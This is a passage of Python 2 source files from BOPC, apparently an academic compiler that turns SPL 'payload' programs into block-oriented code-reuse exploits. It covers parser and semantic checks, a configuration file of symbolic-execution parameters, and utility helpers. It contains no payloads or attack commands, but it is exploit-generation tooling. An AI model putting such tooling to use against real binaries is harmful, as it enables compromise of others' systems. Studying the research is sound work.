            self.__syn_err( "Function '%s' is not supported" % stmt[0][T], stmt[0][L] )

        # this check is redundant
        self.__multi_re( [stmt[1]] + [stmt[-1]],
            [r'^\($', r'^\)$'],
            ["Expected '(', but found", "Expected ')', but found"]
        )

        args = []
        if len(stmt) - 3 > 0:
            for i in range(2, len(stmt)-1, 2):
                self.__multi_re( [stmt[i]] + [stmt[i+1]],
                    [_reg_, r'^,$' if len(stmt)-2 > i+1 else r'^\)$'],
                    ["Invalid register name", "Unexpected symbol"]
                )

                args.append( int(stmt[i][T][3]) )


        # both syscalls and libcalls have the same calling convention (in x64) so we're good ;)
        # we don't need to distinguish them

        # check if call has the right number of arguments (for non-variadic ones)
        if len(args) != call[1] and call[1] != INFINITY:
            self.__syn_err( "Function '%s' has an invalid number of arguments" %
                    stmt[0][T], stmt[0][L] )

        # check max number of registers (arguments) in calling convention
        maxlen = len(SYSCALL_CC) if find_syscall(stmt[0][T]) else len(LIBCALL_CC)

        if len(args) > maxlen:
           self.__syn_err("SPL supports functions with up to %d arguments" % maxlen, stmt[0][L])


        self.__ir_add( {'type':'call', 'name':stmt[0][T], 'args':args, 'dirty':call[2], 'alt':[]} )


    # ---------------------------------------------------------------------------------------------
    # __stmt_label(): A label has been encountered.
    #
    # :Arg stmt: Statement to process
    # :Ret: None.
    #
    @__check_prog_state
    def __stmt_label( self, stmt ):
        # check if label is in correct form
        self.__multi_re( stmt, [_var_], ["Invalid label name"] )

        # give a UID to that label
        # Our semantic analysis states that "every label must be followed by a statement". So we
        # set the UID to be equal with the UID of the next statement. This is because labels
        # are pseudo-statements (they're not part of the IR) and we want the jump target to be
        # at the statement after it.
        #
        # (self.__pc points to the current statement, so +_STEP_UP will point to the next)
        self.__label_dict[ stmt[0][T] ] = '@__' + str(self.__pc + _STEP_UP)

        # add a dummy label (needed for slicing during optimization)
        self.__ir_add( {'type':'label'} )


    # ---------------------------------------------------------------------------------------------
    # __stmt_cond(): An conditional jump statement has been encountered.
    #
    # :Arg stmt: Statement to process
    # :Ret: None.
    #
    @__check_prog_state
    def __stmt_cond( self, stmt ):
        self.__multi_re( stmt,
            [r'^if$', r'^\($', _reg_, _cmpop_, _number_, r'^\)$', r'^goto$', _var_],
            ["Expected 'if', but found",
             "Expected '(', but found",
             "Expected register, but found",
             "Invalid comparison operator",
             "Invalid number",
             "Expected ')', but found",
             "Expected 'goto', but found",
             "Invalid goto target"]
        )

        # When an conditional jump branches to a label that hasn't been declared yet, we add a
        # temporary jump target. After parsing is done, __label_dict will contain all labels,
        # so we can go back and fix missing target.
        self.__ir_add( {'type'   : 'cond',
                        'reg'    : int(stmt[2][T][3]),
                        'op'     : stmt[3][T],
                        'num'    : int(stmt[4][T], 0),
                        'target' : stmt[7][T]} )


    # ---------------------------------------------------------------------------------------------
    # __stmt_jump(): An jump statement (goto) has been encountered.
    #
    # :Arg stmt: Statement to process
    # :Ret: None.
    #
    @__check_prog_state
    def __stmt_jump( self, stmt ):
        self.__multi_re( stmt,
            [r'^goto$', _var_],
            ["Expected 'goto', but found", "Invalid goto target"]
        )

        self.__ir_add( {'type':'jump', 'target':stmt[1][T]} )


    # ---------------------------------------------------------------------------------------------
    # __stmt_return(): An return statement has been encountered.
    #
    # :Arg stmt: Statement to process
    # :Ret: None.
    #
    @__check_prog_state
    def __stmt_return( self, stmt ):
        self.__multi_re( stmt,
            [r'^return$', _number_],
            ["Expected 'return', but found", "Invalid return address"]
        )

        self.__ir_add( {'type':'return', 'target':int(stmt[1][T],0)} )


    # ---------------------------------------------------------------------------------------------
    # __do_syntax_parsing(): This is where syntax analysis starts. Function takes as input the SPL
    #       program (expressed as a list of tokens) and checks whether it follows the EBNF.
    #
    # :Arg tokens: A list of all tokens from the SPL program
    # :Ret: None. If a syntax error occurs, an exception will be raised.
    #
    def __do_syntax_parsing( self, tokens ):

        # -------------------------------------------------------------------------------
        # Merge tokens into statements
        # -------------------------------------------------------------------------------
        stmts, stmt = [], []

        for symbol, lineno in tokens:               # for each token
            if symbol != ';' and symbol != ':':     # not a statement delimiter?

                # if a memory read/write is used, make sure that '*' operator is separated
                if re.search(r'^\*__r.*$', symbol):                     
                    stmt.append( ('*', lineno) )
                    stmt.append( (symbol[1:], lineno) )
                else:
                    stmt.append( (symbol, lineno) ) # append it to the current statement

            else:                                   # statement delimiter
                stmts.append(stmt)                  # append statement to the statements list
                stmt = []                           # clear current statement

        if stmt: stmts.append(stmt)                 # push any leftovers to the list


        # The 1st statement should be the function declaration: "void payload() {". However it
        # also contains the 2nd statement (up to the first delimiter). Split this statement.
        stmt = stmts.pop(0)                         # get 1st statement

        if len(stmt) < 5:                           # not the expected size?
            self.__syn_err("Invalid function declaration", stmt[0][L])

        stmts = [stmt[:5], stmt[5:]] + stmts        # split it and push it back


        # -------------------------------------------------------------------------------
        # To keep the code simple, each statement is parsed in its own function. Here,
        # we quickly identify the type of statement and we invoke the right function to
        # further process it.
        # -------------------------------------------------------------------------------
        for stmt in stmts:                          # for each statement
            # function declaration starts with 'void' and ends with '}':
            #   [('void', 1), ('payload', 1), ('(', 1), (')', 1), ('{', 1)]
            #   [('}',10)]
            if re.search(r'^void$', stmt[0][T]) or re.search(r'^}$', stmt[0][T]):
                self.__stmt_program(stmt)

            # Variable assignments start with 'int' or 'string':
            #   [('int', 2), ('a', 2), ('=', 2), ('0x10', 2)]
            elif re.search(r'^int|string$', stmt[0][T]):
                self.__stmt_var(stmt)

            # Register assignments/modifications and memory reads start with '__r':
            #   [('__r0', 4), ('=', 4), ('1', 4)]
            elif re.search(r'^__r.*', stmt[0][T]):
                self.__stmt_reg(stmt)


            # Memory writes start with '*':            
            #  [('*', 14), ('__r1', 14), ('=', 14), ('__r0', 14)]
            elif re.search(r'^\*', stmt[0][T]):
                self.__stmt_memwr(stmt)

            # Labels consist of a single token:
            #   [('LABEL', 5)]
            elif len(stmt) == 1:
                self.__stmt_label(stmt)

            # Calls have a '(' as 2nd token and a ')' as last token:
            #   [('func', 6), ('(', 6), ('__r0', 6), (',', 6), ('__r1', 6), (',', 6), (')', 6)]
            #
            # (we already know that len(stmt) > 1, so we can access stmt[1])
            elif re.search(r'^\($', stmt[1][T]) and re.search(r'^\)$', stmt[-1][T]):
                self.__stmt_call(stmt)

            # Conditional statements start with 'if':
            #   [('if', 7), ('(', 7), ('__r0', 7), ('>', 7), ('=', 7), ('0x0', 7), (')', 7),
            #    ('goto', 7), ('LABEL', 7)]
            elif re.search(r'^if$', stmt[0][T]):
                self.__stmt_cond(stmt)

            # Jump statements start with 'goto':
            #   [('goto', 8), ('LABEL', 8)]
            elif re.search(r'^goto$', stmt[0][T]):
                self.__stmt_jump(stmt)

            # Returns statements start with 'return':
            #   [('return', 9), ('0x4006fe', 9)]
            elif re.search(r'^return$', stmt[0][T]):
                self.__stmt_return(stmt)

            # Othewise we have a syntax error...
            else:
                self.__syn_err("Unknown keyword '%s'" % stmt[0][T], stmt[0][L])


    # ---------------------------------------------------------------------------------------------

    ''' ======================================================================================= '''
    '''                                    SEMANTIC ANALYSIS                                    '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __fix_jump_targets(): Fix target labels (replace names with pc) for conditional jumps.
    #
    # :Ret: None.
    #
    def __fix_jump_targets( self ):
        dbg_prnt(DBG_LVL_2, "Fixing jump/goto targets...")

        for _, stmt in self.__ir:                   # for each jump statement
            if stmt['type'] == 'cond' or stmt['type'] == 'jump':
                try:
                    # find pc that label belongs to
                    stmt['target'] = self.__label_dict[ stmt['target'] ]
                except KeyError:
                     self.__sem_err("Label '%s' is not declared" % stmt['target'])

        dbg_prnt(DBG_LVL_2, "Done.")


    # ---------------------------------------------------------------------------------------------
    # __do_semantic_checks(): Perform a basic semantic analysis. This function performs a series
    #       of some semantic checks that IR has to pass.
    #
    # :Ret: None. If a semantic error occurs, an exception will be raised.
    #
    def __do_semantic_checks( self ):
        dbg_prnt(DBG_LVL_2, "Semantic analysis started.")


        # --------------------------------=[ CHECK #1 ]=---------------------------------
        # -----------------=[ "A variable can be declared only once" ]=------------------
        #
        # This check is already done in __stmt_var() as it's way easier to do it there.


        # --------------------------------=[ CHECK #2 ]=---------------------------------
        # ----------=[ "An return must be the last statement of the program" ]=----------
        nret = len([s for _, s in self.__ir if s['type'] == 'return'])

        if nret > 1 or nret == 1 and self.__ir[-1][1]['type'] != 'return':
            self.__sem_err("Only one return is allowed and only at the end of the program")


        # --------------------------------=[ CHECK #3 ]=---------------------------------
        # --------------------=[ "A statement must follow a label" ]=--------------------
        #
        # A tricky check. First we check whether the last statement is _not_ a label. Then, we get
        # all statements (we only care about statement type -VARSET, etc) that follow a label
        # (there's always a next statement after a label, because the last statement is not label)
        # and check whether there are labels there.
        #
        if self.__ir[-1][1]['type'] == 'label' or \
           'label' in [self.__ir[i+1][1]['type'] for i, (_, s) in enumerate(self.__ir) \
           if s['type'] == 'label']:
                self.__sem_err("A label must be followed by a statement (labels are not statements)")


        # --------------------------------=[ CHECK #4 ]=---------------------------------
        # -------=[ "A variable/register must be assigned before it gets used" ]=--------
        #
        # Here we "simulate" the IR. When we encounter an assignment, we mark this variable/
        # register. When we use a variable/register, we check if it's marked. Note that this
        # check does not consider the control flow of the program (e.g. conditional jumps and
        # goto).
        #
        tvar, treg = { }, { }                       # temp variable and register tables

        for _, stmt in self.__ir:                   # for each statement (linear sweep)
            
            # -----------------------------------------------------------------
            if stmt['type'] == 'varset':
                for val in stmt['val']:
                    if isinstance(val, tuple):
                        if val[0] in tvar:
                            tvar[ val[0] ] = 1      # mark variable
                        else:
                            self.__sem_err("Variable '%s' referenced before assignment" % val[0])

                # add this after isinstance() check to catch cases like $c := [$c]
                # mark variable (if it's set for 2nd time don't make it 0)
                tvar[ stmt['name'] ] = tvar.get(stmt['name'], 0) * 1

            
            # -----------------------------------------------------------------
            elif stmt['type'] == 'regset':
                if isinstance(stmt['val'], tuple):  # reference of another variable?
                    if stmt['val'][0] in tvar:
                        tvar[ stmt['val'][0] ] = 1  # mark variable
                    else:
                        self.__sem_err("Variable '%s' referenced before assignment" % stmt['val'][0])


                treg[ stmt['reg'] ] = treg.get(stmt['reg'], 0) * 1

            
            # -----------------------------------------------------------------
            elif stmt['type'] == 'regmod':
                if stmt['reg'] in treg:
                    treg[ stmt['reg'] ] = 1
                else:
                    self.__sem_err("Register '__r%d' referenced before assignment" % stmt['reg'])
                   
           
            # -----------------------------------------------------------------
            elif stmt['type'] == 'memrd':
                if stmt['mem'] in treg:
                    treg[ stmt['mem'] ] = 1
                else:
                    self.__sem_err("Register '__r%d' referenced before assignment" % stmt['mem'])

                # mark register being set
                treg[ stmt['reg'] ] = treg.get(stmt['reg'], 0) * 1

                
            # -----------------------------------------------------------------
            elif stmt['type'] == 'memwr':
                if stmt['mem'] in treg:
                    treg[ stmt['mem'] ] = 1
                else:
                    self.__sem_err("Register '__r%d' referenced before assignment" % stmt['mem'])

                if stmt['val'] in treg:
                     treg[ stmt['val'] ] = 1
                else:
                    self.__sem_err("Register '__r%d' referenced before assignment" % stmt['val'])


            # -----------------------------------------------------------------
            elif stmt['type'] == 'cond':
                if stmt['reg'] in treg:
                    treg[ stmt['reg'] ] = 1
                else:
                    self.__sem_err("Register '__r%d' referenced before assignment" % stmt['reg'])


            # -----------------------------------------------------------------
            elif stmt['type'] == 'call':
                for arg in stmt['args']:
                    if arg in treg:
                        treg[ arg ] = 1

                    else:
                        self.__sem_err("Register '__r%d' referenced before assignment" % arg)


        # --------------------------------=[ CHECK #5 ]=---------------------------------
        # -------------------=[ "A variable/register must be used" ]=--------------------
        #
        # Here we check if there are any registers/variables that are unused. This is actually
        # gets calculated on the previous check. If a variable/register is used, the treg/tvar
        # it will be 1. Otherwise it's 0. Note that this is a soft error. Execution doesn't
        # halt when checks fails.
        #        
        for reg, used in treg.iteritems():
            if not used:
               self.__sem_warn("Register '__r%d' is unused" % reg)

        for var, used in tvar.iteritems():
            if not used:
                self.__sem_warn("Variable '%s' is unused" % var)

        del treg
        del tvar


        # -----------------------------=[ OPTIONAL CHECKs ]=-----------------------------
        # There are other checks that we could do as well:
        #   [1]. A label must be referenced
        #   [2]. A variable must be declared only once
        #   ...
        #

        dbg_prnt(DBG_LVL_2, "Semantic analysis completed.")


    # ---------------------------------------------------------------------------------------------

    ''' ======================================================================================= '''
    '''                                 MISCELLANEOUS FUNCTIONS                                 '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # _calc_stats(): Collect some statistics regarding generated IR.
    #
    # :Ret: None.
    #
    def _calc_stats( self ):
        # nreal: the number of real statement (those that need a candidate block)
        self.nreal = 0

        for stmt in self:                           # for each statement
            if stmt['type'] not in ['entry', 'varset', 'label', 'jump', 'return']:
                self.nreal += 1

        # nregs contains the number of distinct virtual registers. This is calculated as follows:
        # It iterates over all statements and gets all registers in 'regset' statements (thanks
        # to our semantic analysis, it's not allowed for a 'regmod' to use a register that hasn't
        # been used in a previous 'regset'; thus we only care about 'regset'). Then in counts the
        # distinct registers by transforming the list into a set.
        self.nregs = len( set([s['reg'] for s in self if s['type'] in ['regset', 'memrd']]) )

        # the number of distinct variables. The processing is identical to nregs
        self.nvars = len( set([s['name'] for s in self if s['type'] == 'varset']) )

        # the number of distinct variables that their references are assigned to registers
        self.nregvars = len( set([s['val'][0] for s in self
                                    if s['type'] == 'regset' and isinstance(s['val'], tuple)]) )

        # the number of "free" variables. Free variables are not assigned to any register, so
        # they can be placed at any memory address (due to the AWP)
        self.nfreevars = self.nvars - self.nregvars


    # ---------------------------------------------------------------------------------------------

    ''' ======================================================================================= '''
    '''                                     CLASS INTERFACE                                     '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __init__(): Class constructor.
    #
    # :Arg filename: The SPL source file name
    #
    def __init__( self, filename ):
        self.__prog = filename                      # program's file name is all we need


    # ---------------------------------------------------------------------------------------------
    # __getitem__(): Get i-th statement from IR. Out-of-order statements are groups in the same
    #       list entry, so we cannot find them in O(1) without some auxiliary data struct. For
    #       now we simply do a linear search.
    #
    # :Arg idx: Index of the IR statement
    # :Ret: The requested IR statement
    # 
    def __getitem__( self, idx ):
        assert( idx >= 0 )                          # bound checks

        for _, stmt in self.__ir:                   # for each IR statement list
            # each list has a single element here
            if stmt[0]['uid'] == idx: return stmt   # if index found return statement

        raise IndexError("No statement with uid = %d found" % idx )


    # ---------------------------------------------------------------------------------------------
    # __len__(): Get the number of IR statements.
    #
    # :Ret: Each time function returns a different statement.
    #
    def __len__( self ):
        return len(self.__ir)


    # ---------------------------------------------------------------------------------------------
    # __iter__(): Iterate over all statements. This function is a generator over all statements
    #       (no matter if they are out-of-order or not).
    #
    # :Ret: Each time function returns a different statement.
    #
    def __iter__( self ):
        for _, stmt_r in self.__ir:                 # for each IR statement list
            for stmt in stmt_r:                     # for each "parallel" statement
                yield stmt                          # return next statement


    # ---------------------------------------------------------------------------------------------
    # compile(): Compile the source file into its Intermediate Representation (IR). Make sure that
    #       the file follows the syntax of and the semantics of the SPL.
    #
    # :Ret: None. If an error occurs, program will terminate.
    #
    def compile( self ):
        dbg_prnt(DBG_LVL_1, "Compiling '%s'..." % self.__prog)
        dbg_prnt(DBG_LVL_2, "Parsing started.")

        tokens = []                                 # place all tokens here

        try: 
            with open(self.__prog, "r") as file:    # open source file
                # -----------------------------------------------------------------------
                # Do the lexical analysis here
                # -----------------------------------------------------------------------
                for line in file:                   # process it line by line
                    # drop all comments "//" from current line (be careful though to not
                    # drop "comments" that are inside quotes)
                    line = re.sub("(?!\B\"[^\"]*)\/\/(?![^\"]*\"\B).*\n", '', line)


                    # tokenize line and append it to the token list
                    lexical = shlex.shlex(line)     # create a lexical analysis object

                    # TODO: this is not recognized as comment: //string s2 = "/this";

                    #  lexical.commenters = '//'    # alternative way to drop comments
                    lexical.wordchars += ''.join(set(''.join(asg_ops + cmp_ops) + '+-&'))

                    symbols = [token for token in lexical]
                    if symbols:                     # if there are any tokens

                        # tokens are tuples (symbol, line number)
                        tokens += zip(symbols, [self.__lineno]*len(symbols))

                    self.__lineno = self.__lineno+1 # update line counter

        except IOError:
            fatal("File '%s' not found" % self.__prog)


        self.__do_syntax_parsing(tokens)            # do the syntax analysis

        dbg_prnt(DBG_LVL_2, "Parsing complete.")

        # ===-----
        # At this point, program has a valid syntax. We move on the semantic analysis
        # ===-----

        self.__fix_jump_targets()                   # fix goto branches (label => pc)
        self.__do_semantic_checks()                 # do the semantic checks


        # at this point each statement is the form: [pc, stmt]. This form is not suitable for
        # out of order statements, as we want them in the form: [pc, [stmt1, stmt2, ...]]. This
        # the job of the optimizer, but for now we have to prepare IR accordingly, so we convert
        # each statement into the form: [pc, [stmt]].
        for s in self.__ir: s[1] = [s[1]]

        self._calc_stats()                          # get IR statistics

        dbg_prnt(DBG_LVL_1, "Compilation completed.")


    # ---------------------------------------------------------------------------------------------
    # get_ir(): Return the compiled IR.
    #
    # :Ret: The IR.
    #
    def get_ir( self ):
        return self.__ir


# -------------------------------------------------------------------------------------------------


================================================
FILE: source/config.py
================================================
#!/usr/bin/env python2
# -------------------------------------------------------------------------------------------------
#
#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  
#   dP"""88""""""Y8, ,d8P""d8P"Y8b,   dP"""88""""""Y8,  ,88"""Y8b,
#   Yb,  88      `8b,d8'   Y8   "8b,dPYb,  88      `8b d8"     `Y8
#    `"  88      ,8Pd8'    `Ybaaad88P' `"  88      ,8Pd8'   8b  d8
#        88aaaad8P" 8P       `""""Y8       88aaaad8P",8I    "Y88P'
#        88""""Y8ba 8b            d8       88"""""   I8'          
#        88      `8bY8,          ,8P       88        d8           
#        88      ,8P`Y8,        ,8P'       88        Y8,          
#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, 
#       88888888P"     `"Y8888P"'          88          `"Y8888888 
#
#   The Block Oriented Programming (BOP) Compiler - v2.1
#
#
# Kyriakos Ispoglou (ispo) - ispo@purdue.edu
# PURDUE University, Fall 2016-18
# -------------------------------------------------------------------------------------------------
#
#
# config.py
#
# This is the main configuration file with BOPC options.
#
# NOTE: There are a bunch of minor configuration options, on coreutils.py but there is no reason
#       to modify them.
#
# -------------------------------------------------------------------------------------------------


# -------------------------------------------------------------------------------------------------
# Depth metric for functions (can be 'min', 'max' or 'median')
#  
# Determine the metric for measuring function's depth. This option estimates the minimum number of
# distinct basic blocks that should be executed within a function. To do that, one should look at
# the shortest paths from the entry point to all final basic blocks (those that end with a return
# instruction) and select as depththe length of the minimum of these (shortest) paths ('min' 
# option).
#
# However this metric might not always work that well, as it's very common to make argument checks
# at the very early stages of a function and abort if they do not meet the requirements.
#   
# Hence, we provide 3 metrics: The minimum among the shortest paths that we discussed, the maximum
# ('max' option) and the median of all shortest paths ('median' option).
# 
FUNCTION_DEPTH_METRIC = 'min'


# -------------------------------------------------------------------------------------------------
# When the Symbolic Execution engine gives up on a basic block abstraction (in seconds)
#
ABSBLK_TIMEOUT = 5


# -------------------------------------------------------------------------------------------------
# How many tries we should make before we give up on __enum_induced_subgraphs().
#
# Enumerating all induced subgraphs can take exponential time. To address that we set an upper
# bound. After calculating a fixed number of induced subgraphs, we give up, and we use the 
# best ones up to that point. Set this value to -1 to set the upper bound to infinity.
#
MAX_INDUCED_SUBRAPHS_TRIES = -1
MAX_ALLOWED_INDUCED_SUBGRAPHS = 1024


# -------------------------------------------------------------------------------------------------
# How many times we should permute the OOO SPL statements before we give up. Set to -1 to try all
# possible permutations. This makes sense when 'ooo' optimization is enabled
#
N_OUT_OF_ORDER_ATTEMPTS = 3


# -------------------------------------------------------------------------------------------------
# Trace searching algorithm picks the K shortest paths from Delta Graph (K = PARAMETER_K). However
# there are cases that there are >K paths that are all worth to try. In those cases we keep trying
# paths, as long as their distances are below this threshold.
#
# MAX_GOOD_INDUCED_SUBGRAPH_SIZE = 10 (NOT IMPLEMENTED)
#
PARAMETER_K = 4#10


# -------------------------------------------------------------------------------------------------
# Number of different shortest paths between 2 functional blocks (needed for concolic execution).
# Set to -1 to try all shortest paths
#
PARAMETER_P = 8


# -------------------------------------------------------------------------------------------------
# The actual size of load/store operations for memrd and memwr SPL statements in bytes. This
# parameter can be 1, 2, 4 or 8 bytes.
#
MEMORY_LOADSTORE_SIZE = 1


# -------------------------------------------------------------------------------------------------
# When the Symbolic Execution engine gives up on trace searching (in seconds). That is, when
# the concolic execution gives up on verifying a dispatcher gadget.
#
SE_TRACE_TIMEOUT = 8


# -------------------------------------------------------------------------------------------------
# Maximum length of the final trace (a candidate execution trace cannot have more blocks that this).
#
MAX_ALLOWED_TRACE_SIZE = 100


# -------------------------------------------------------------------------------------------------
# Maximum number of basic blocks in path between 2 accepted blocks (i.e., maximum number of basic
# blocks in a dispatcher).
#
MAX_ALLOWED_SUBPATH_LEN = 40


# -------------------------------------------------------------------------------------------------
# The stack base address (along with $rsp) for symbolic execution.
#
# WARNING: Make sure that RSP doesn't go beyond page limit (o/w addresses are not +w) +0x800 is a
#          very good offset. Don't change it !
# 
STACK_BASE_ADDR = 0x7ffffffffff0000
RSP_BASE_ADDR   = STACK_BASE_ADDR + 0x800


# -------------------------------------------------------------------------------------------------
# In some cases it may be worth to make $rbp symbolic as well (depends on the binary).
#
MAKE_RBP_SYMBOLIC = False


# -------------------------------------------------------------------------------------------------
# What if the final solution requires some registers to be initialized upon entry point? In that
# case we can either shift the entry point backwards, at the point that register is initiliazed,
# and re-run BOPC from there, or we can simply such solutions.
#
ALLOW_REGISTER_WRITES = True


# -------------------------------------------------------------------------------------------------
# I have no idea what this is for, but it seems that I was planning to make another optimization.
#
MAXIMUM_THRESHOLD = 0x800


# -------------------------------------------------------------------------------------------------
# When we deal with loops, the Symbolic Execution engine should simulate the loop the same number
# of times (to ensure that the all iterations can be exetuted successfully under exploitation).
# However, when we have infinity loops, we cannot simulate the loop and infinite amount of times,
# but instead we have to stop at a certain threshold.
#
# WARNING: Make sure that in case of conditional loops, the number of expected iterations is
#          larger than this value, otherwise we will get no solution
#
SIMULATED_LOOP_ITERATIONS = 4 #128


# -------------------------------------------------------------------------------------------------
# Another optimization that never implemented...
#
ADAPTIVE_LOOP_SIMULATION = True


# -------------------------------------------------------------------------------------------------


================================================
FILE: source/coreutils.py
================================================
#!/usr/bin/env python2
# -------------------------------------------------------------------------------------------------
#
#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  
#   dP"""88""""""Y8, ,d8P""d8P"Y8b,   dP"""88""""""Y8,  ,88"""Y8b,
#   Yb,  88      `8b,d8'   Y8   "8b,dPYb,  88      `8b d8"     `Y8
#    `"  88      ,8Pd8'    `Ybaaad88P' `"  88      ,8Pd8'   8b  d8
#        88aaaad8P" 8P       `""""Y8       88aaaad8P",8I    "Y88P'
#        88""""Y8ba 8b            d8       88"""""   I8'          
#        88      `8bY8,          ,8P       88        d8           
#        88      ,8P`Y8,        ,8P'       88        Y8,          
#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, 
#       88888888P"     `"Y8888P"'          88          `"Y8888888 
#
#   The Block Oriented Programming (BOP) Compiler - v2.1
#
#
# Kyriakos Ispoglou (ispo) - ispo@purdue.edu
# PURDUE University, Fall 2016-18
# -------------------------------------------------------------------------------------------------
#
#
# coreutils.py:
#
# This module contains basic declarations and functions that are being used by all other modules.
#
# -------------------------------------------------------------------------------------------------
from config import *                                # load configuration options

from graphviz import Digraph
import networkx as nx
import datetime
import random
import re
import angr
import textwrap


# -------------------------------------------------------------------------------------------------

''' =========================================================================================== '''
'''                                    CONSTANT DECLARATIONS                                    '''
''' =========================================================================================== '''

# -------------------------------------------------------------------------------------------------
RETURN_SUCCESS     = 0                              # return code for success
RETURN_FAILURE     = -1                             # return code for failure

DBG_LVL_0          = 0                              # debug level 0: Display no information
DBG_LVL_1          = 1                              # debug level 1: Display minimum information
DBG_LVL_2          = 2                              # debug level 2: Display basic information
DBG_LVL_3          = 3                              # debug level 3: Display detailed information
DBG_LVL_4          = 4                              # debug level 3: Display all information

INFINITY           = 9999999                        # value of infinity

START_PC           = 0                              # PC of the for the 1st statement

ADDR2NODE          = { }                            # map addresses to basic block nodes
ADDR2FUNC          = { }                            # map basic block addresses to their functions
STR2BV             = { }                            # map strings to bitvectors


# WARNING: be very careful how to set rbp
FRAMEPTR_BASE_ADDR = RSP_BASE_ADDR + 0xc00          # base address of rbp (when it's used)

HARDWARE_REGISTERS = [                              # x64 hardware registers
    'rax', 'rdx', 'rcx', 'rbx', 'rdi', 'rsi', 'rsp', 'rbp',
    'r8',  'r9',  'r10', 'r11', 'r12', 'r13', 'r14', 'r15' 
]

SYM2ADDR = { }

SYMBOLIC_FILENAME = 'foo.txt'                       # filename for the symbolic execution to use


# -------------------------------------------------------------------------------------------------

''' =========================================================================================== '''
'''                                     AUXILIARY FUNCTIONS                                     '''
''' =========================================================================================== '''

# -------------------------------------------------------------------------------------------------
dbg_lvl = DBG_LVL_0                                 # initially, debug level is set to 0


# -------------------------------------------------------------------------------------------------
# set_dbg_lvl(): Set the current debug level. This is a small trick to share a variable between
#   modules. We set the debug level once during startup, so we don't have to carry it around the
#   modules.
# 
# :Arg lvl: Desired debug lebel.
# :Ret: None.
#
def set_dbg_lvl( lvl ):
    global dbg_lvl                                  # use the global var     
    if lvl: dbg_lvl = lvl                           # set it accordingly (if lvl is proper)


# ---------------------------------------------------------------------------------------------
# to_uid(): Cast program counter (PC) to unique ID (UID).
#
# :Arg pc: The program counter
# :Ret: The uid.
#
def to_uid( pc ):
    if not re.match(r'^@__[0-9]+$', pc):            # verify pc
        raise Exception("Invalid Program counter '%s'." % pc)

    return int(pc[3:])                              # simply drop the first 3 characters


# ---------------------------------------------------------------------------------------------
# pretty_list(): Cast a list into a pretty string, for displaying to the user. This can be
#       also done using join(), but code starts getting ugly when we have to cast each element.
#
# :Arg uglylist: The list to work on
# :Ret: A string containing a pretty "join" of the list.
#
def pretty_list( uglylist, delimiter=' - '):
    pretty = ''                                     # the final string

    for elt in uglylist:
        if isinstance(elt, int) or isinstance(elt, long):
            pretty += delimiter + '%x' % elt

        elif isinstance(elt, str):
            pretty += delimiter + elt

        elif isinstance(elt, angr.analyses.cfg.cfg_node.CFGNode):
            pretty += delimiter + '%x' % elt.addr

        else:
            fatal("Unsupported list element type'%s'" % str(type(elt)))


    # drop the first delimiter (if exists) and return string
    return pretty[len(delimiter):] if pretty else ''


# -------------------------------------------------------------------------------------------------
# to_edges(): Convert a path to edges. That is, given the path P = ['A', 'B', 'C', 'D', 'E'],
#       return its edges: [('A', 'B'), ('B', 'C'), ('C', 'D'), ('D', 'E')]. Function is a 
#       generator, so it returns one edge at a time.
#
#       Note that function can be implemented with a single line: "return zip(path, path[1:])".
#       However, the problem with zip() is that it creates 2 more copies of the list, which is
#       not very efficient, when paths are long and all we want is to iterate over the edges.
#
# :Arg path: A list that contains a path
# :Arg direction: Edge direction (forward/backward)
# :Ret: Function is a generator. Each time the next edge from the path is returned.
#
def to_edges( path, direction='forward' ):
    if len(path) < 2: return                        # nothing to do

    u = path[0]                                     # get the 1st node
    for v in path[1:]:
        if   direction == 'forward':  yield (u, v)  # return the previous and the current node
        elif direction == 'backward': yield (v, u)  # or return the backward edge

        u = v                                       # update previous node


# -------------------------------------------------------------------------------------------------
# mk_reverse_adj(): Given an Adjacency List, make the Reverse Adjacency List.
#
# :Arg adj: The Adjacency List
# :Ret: Function returns a dictionary which encodes the Reverse Adjacency List.
#
def mk_reverse_adj( adj ):        
        radj = { }

        for a, b in adj.iteritems():
            for c in b:
                radj.setdefault(c, []).append(a)

        return radj


# -------------------------------------------------------------------------------------------------
# disjoint(): Check whether two sets are disjoint or not.
#
# :Arg set_a: The first set
# :Arg set_b: The second set
# :Ret: If sets are disjoint, function returns True. Otherwise it returns False.
#
def disjoint( set_a, set_b ):
    for a in set_a:
        for b in set_b:
            if a == b: 
                return False

    return True


# -------------------------------------------------------------------------------------------------
# log(): Log execution statistics to a file.
#
# :Arg msg: Message to log
# :Ret: None.
#
def log( msg ):
    pass                                            # not used.


# -------------------------------------------------------------------------------------------------

''' =========================================================================================== '''
'''                                     PRINTING FUNCTIONS                                      '''
''' =========================================================================================== '''

# -------------------------------------------------------------------------------------------------
# now(): Get current time. Time is prepended to every print statement.
#
# :Ret: A string containing the current time.
#
def now():
    return '[%s]' % datetime.datetime.now().strftime("%H:%M:%S,%f")[:-3]


# -------------------------------------------------------------------------------------------------
# dbg_prnt(): Display a debug message to the user.
#
# :Arg lvl: Message's debug level
# :Arg msg: Message to print
# :Arg pre: Message prefix (OPTIONAL)
# :Ret: None.
#
def dbg_prnt( lvl, msg, pre='[+] ' ):
    if dbg_lvl >= lvl:                              # print only if you're in the right level
        print now(), pre + msg


# -------------------------------------------------------------------------------------------------
# dbg_arb(): Display a debug message followed by an arbitrary data structure to the user.
#
# :Arg lvl: Message's debug level
# :Arg msg: Message to print
# :Arg arb: The arbitrary data struct (e.g., list, dict) to print
# :Arg pre: Message prefix (OPTIONAL)
# :Ret: None.
#
def dbg_arb( lvl, msg, arb, pre='[+] ' ):
    if dbg_lvl >= lvl:                              # print only if you're in the right level
        print now(), pre + msg, arb
    

# -------------------------------------------------------------------------------------------------
# func_name(): Convert an address to the name of its function, or
# "__unknown" if it cannot be found.
#
# :Arg addr: The address to lookup
# :Ret: Returns a string with the name of the function containing the address, or "__unknown".
#
def func_name ( addr ):
    if addr in ADDR2FUNC:
        return ADDR2FUNC[addr].name
    else:
        return "__unknown"


# -------------------------------------------------------------------------------------------------
# fatal(): This function is invoked when a fatal error occurs. It prints the error and terminates
#       the program.
#
# :Arg err: Error message to print
# :Ret: None.
#
def fatal( err ):
